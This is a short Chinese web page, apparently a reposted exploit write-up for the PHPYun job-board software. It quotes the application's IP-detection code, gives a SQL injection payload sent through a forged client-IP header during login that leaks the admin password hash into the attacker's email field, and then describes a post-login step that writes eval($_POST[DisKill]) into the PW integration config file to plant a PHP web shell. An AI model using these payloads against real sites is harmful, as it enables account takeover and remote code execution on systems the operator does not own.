来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] /model/class/action.class.php 603行function fun_ip_get() { if (getenv(HTTP_CLIENT_IP) strcasecmp(getenv(HTTP_CLIENT_IP), unknown)) { $ip = getenv......
/model/class/action.class.php 603行
function fun_ip_get() {
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”)) {
$ip = getenv(“HTTP_CLIENT_IP”);
} else
if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”)) {
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
} else
if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”)) {
$ip = getenv(“REMOTE_ADDR”);
} else
if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], “unknown”)) {
$ip = $_SERVER['REMOTE_ADDR'];
} else {
$ip = “unknown”;
}
return ($ip);
}
exp:注册个人会员.然后登录时伪造ip id可在第一次登录是抓包得到 登录后看email可得到管理32位md5
127.1′,`email`=(select password from phpyun_admin_user where username=’admin’) where `uid`=1#
uid在登录是抓包可得.
后台getshell
function save_action()
{
extract($_POST); $config = “<?php “;
$uc_config = str_replace(“′”,”‘”,$uc_config);
$uc_config = str_replace(“”",”"”,$uc_config);
$uc_config = str_replace(“\’”,”"”,$uc_config);
$uc_config = str_replace(“\‘”,”"”,$uc_config);
$uc_config = str_replace(“\’”,”"”,$uc_config);
$uc_config = str_replace(“’”,”"”,$uc_config);
$uc_config = str_replace(“‘”,”"”,$uc_config);
$uc_config = str_replace(“\”",”"”,$uc_config);
$config .= $uc_config;
$path = APP_PATH.”/api/pw_api/pw_config.php”;
$fp = @fopen($path,”w”);
fwrite($fp,$config);
fclose($fp);
过滤了不少.但是对我们没啥用
进入后台->网站工具->整合pw
最后面插入
eval ($_POST[DisKill]) ;
开启pw
一句话地址:http://www.2cto.com /api/pw_api/pw_config.php
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com